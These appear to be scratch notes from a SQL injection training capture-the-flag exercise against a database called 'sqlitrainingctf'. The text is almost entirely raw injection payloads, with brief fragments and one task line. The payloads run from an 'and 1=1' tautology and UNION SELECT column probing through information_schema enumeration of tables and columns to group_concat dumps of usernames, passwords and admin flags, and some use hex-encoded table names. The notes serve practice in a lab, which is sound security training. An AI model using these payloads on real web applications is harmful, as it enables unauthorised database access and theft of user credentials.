bob' and 1=1 -- //
1' union select 1,2,3,4 -- //
1' union select 1,2,3,concat(database()) -- // | 1' union select 1,2,3,database() -- //
1' union select 1,2,3,group_concat(table_name)+from information_schema.tables where table_schema=database() -- //
1' union select 1,2,3,group_concat(column_name)+from information_schema.columns where table_schema=database() -- //

1' union select 1,2,3,group_concat(username,0x3a,password,0x3a)+from sqlitrainingctf.users -- //
1' union select 1,2,3,group_concat(username,0x3a,password,0x3a,is_admin,0x3a)+from sqlitrainingctf.users -- //



group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from sqlitrainingctf.users --



diskinfo


ahsil 
1' union select 1,2,3,group_concat(filename)+from sqlitrainingctf.diskinfo -- //


1' union select 1,2,3,group_concat(filename)+from sqlitrainingctf.0x6469736b696e666f  -- //

1' union select 1,2,3,group_concat(column_name)+from information_schema.columns where table_schema=database() -- //
3. Extract the value of column 'filename' from table 'diskinfo'
